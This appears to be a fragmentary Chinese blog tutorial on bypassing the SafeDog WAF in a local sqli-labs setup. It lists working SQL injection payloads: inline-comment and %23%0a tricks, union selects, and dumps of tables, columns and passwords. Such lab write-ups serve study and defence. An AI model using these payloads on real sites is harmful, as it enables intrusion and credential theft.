windows11+phpstudy2018+sqli-labs
apache2.4
这一项,否则可能要浪费半个下午的时间来整(受害者本人自述了属于是),因为在提前安装好这个后,再安装安全狗,就会出现如下图所示的情况,这时候就很容易进行配置了"D:\phpStudy\PHPTutorial\Apache\bin"
,然后进入cmd中(以管理员身份运行)C:\Windows\system32>d:D:\>cd D:\phpStudy\PHPTutorial\Apache\binD:\phpStudy\PHPTutorial\Apache\bin> httpd -k install -n apache2.4//安装插件
此时直接点击确定就好了,然后打开就会发现插件是已安装的
/!*
进行测试即可id=1' and/*////*/1 --+
/*!00000*/
这种的,用实例来解释是最好理解的mysql> select @@version;+-----------+| @@version |+-----------+| 5.5.53 |+-----------+1 row in set (0.00 sec)mysql> select /*!999991*/;ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1mysql> select /*!000001*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!1*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!505531*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!505541*/;ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
/*!000001*/=/*!000001*/
语句尝试进行绕过id=1' order/*////*/by 3 --+
id=1' order/*////*/by 4 --+
id=-1' union/*/!*!**/select 1,2,3--+
id=-1' union/*//--**/select 1,2,3--+id=-1' union/*/!--**/select 1,2,3--+id=-1' union/*/-*!!*/select 1,2,3--+
/*xxx*/()
这种方式来进行绕过,利用bp设置如下id=-1' union/*/!*!**/select 1,2,database/*///-*/()--+
/*!*/
内联注释法)/*!()*/
这种,利用bp在括号前面加上五个数字,依次来检验哪个可以进行绕过,具体设置如下id=-1' union/*/!*!**/select 1,2,database/*!20553()*/--+
group_concat(table_name) from information_schema.tables where table_schema=database()
from/*!information_schema.tables*/
/*!%23%0a*/
这种形式,我们先进行本地测试mysql> select /*!# -> 1*/;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)mysql> select /*!#/* -> 1*/ -> ;+---+| 1 |+---+| 1 |+---+1 row in set (0.00 sec)
/**/
,也是可以实现绕过的,此时我们先试本地测试的第一种方法?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from/*!%23%0ainformation_schema.tables*/ where table_schema='security'--+
?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from/*!%23/*%0ainformation_schema.tables*/ where table_schema='security'--+
--+
?id=-1' union/*/!*!**/select%201,2,group_concat(table_name)from/*!--+/*%0ainformation_schema.tables*/ where table_schema='security'--+
?id=-1' union/*/!*!**/select%201,2,group_concat(column_name)from/*!--+/*%0ainformation_schema.columns*/ where table_name='users'--+
?id=-1' union/*/!*!**/select%201,2,group_concat(id,password)from/*!--+/*%0ausers*/--+
like["%23"]
,这个的话我们知道%23是注释符的含义,那么在这里的时候,它这个语句到底有什么作用呢,我们测试一下就知道了select * from users where id=1 ;
like["%23"]
,构造payload如下select * from users where id=1 like "[%23]";
select * from users where id=1 like "[%23]" union select * from users;
users where id=1 like "[%23]"
这个是空,那它这条语句就相当于select * from users
id=-1' like "[%23]" /*!10440union select*/ 1,2,3 --+
id=-1' like "[%23]" /*!10440union%0aselect*/ 1,2,3 --+
//爆库id=-1' like "[%23]" /*!10440union%0aselect*/ 1,2,database/*!--+/*%0a()*/ --+//爆表id=-1' like "[%23]" /*!10440union%0aselect*/ 1,2,group_concat(table_name)from/*!--+/*%0ainformation_schema.tables */where table_schema='security'--+//爆列id=-1' like "[%23]" /*!10440union%0aselect*/ 1,2,group_concat(column_name)from/*!--+/*%0ainformation_schema.columns */where table_name='users'--+//爆字段id=-1' like "[%23]" /*!10440union%0aselect*/ 1,2,group_concat(id,username,password)from/*!--+/*%0ausers*/--+
侵权请私聊公众号删文
热文推荐
欢迎关注LemonSec
觉得不错点个“赞”、“在看”